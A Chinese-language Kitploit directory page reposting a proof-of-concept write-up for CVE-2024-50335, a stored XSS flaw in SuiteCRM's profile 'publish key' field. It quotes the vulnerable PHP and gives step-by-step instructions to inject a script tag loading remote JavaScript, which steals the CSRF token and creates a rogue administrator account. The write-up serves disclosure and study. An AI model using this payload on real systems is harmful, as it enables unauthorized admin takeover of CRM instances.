Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-50335 — SuiteCRM中的一个安全漏洞,可被利用来窃取CSRF令牌并执行未经授权的操作,例如在未正确认证的情况下创建新的管理员用户。 | Kitploit
工具/GitHubGitHub/shellkraft/cve-2024-50335
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubshellkraft/cve-2024-50335

CVE-2024-50335

SuiteCRM中的一个安全漏洞,可被利用来窃取CSRF令牌并执行未经授权的操作,例如在未正确认证的情况下创建新的管理员用户。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-50335:已验证的XSS漏洞在“发布密钥”字段中允许未经授权的管理员用户创建

摘要

SuiteCRM 编辑个人资料页面中的“发布密钥”字段存在反射型跨站脚本(XSS)漏洞,允许攻击者注入恶意 JavaScript 代码。该漏洞可被利用来窃取 CSRF 令牌并执行未经授权的操作,例如在没有适当认证的情况下创建新的管理员用户。


详情

该漏洞源于 SuiteCRM 应用程序对发布密钥字段的输入验证和清理不足。当攻击者注入恶意脚本时,该脚本会在已认证用户的会话上下文中执行。注入的脚本(o.js)随后利用捕获的 CSRF 令牌伪造请求,创建新的管理员用户,从而有效破坏 CRM 实例的完整性和安全性。


影响

此漏洞是一个关键的跨站脚本(XSS)问题。其影响包括:

  1. 未经授权的管理访问:攻击者可以创建新的管理员用户,可能获得对 CRM 实例的完全控制。
  2. CSRF 令牌窃取:允许在已认证用户不知情的情况下执行未经授权的操作。
  3. 数据完整性受损:操纵用户账户和设置的能力可能导致数据丢失、泄露或未经授权的修改。

存在漏洞的 PHP 源代码

root@kitploit:~
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);

$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";

$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";

$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);

验证概念(PoC)

  1. 使用有效的管理员凭据登录 SuiteCRM。
  2. 导航至编辑个人资料:访问管理员账户的编辑个人资料页面。
  3. 在“高级”选项卡下的“发布密钥”字段中,注入以下脚本:
root@kitploit:~
<script src=//localhost:1235/o.js>
  1. 确保 o.js 托管在 localhost 的 1235 端口上的服务器中,提供如提供的 JavaScript 代码片段所述的利用代码。
  2. 保存对管理员个人资料的更改。
  3. 重新加载 SuiteCRM 页面后,恶意 o.js 脚本执行,窃取 CSRF 令牌并利用其创建具有以下凭据的新管理员用户。
root@kitploit:~
Username - imposter
Password - ok
  1. 使用新创建的管理员用户凭据登录,以验证利用成功。

https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197


参考

  • https://nvd.nist.gov/vuln/detail/CVE-2024-50335
  • https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-8rw6-g96j-3w7m
下载工具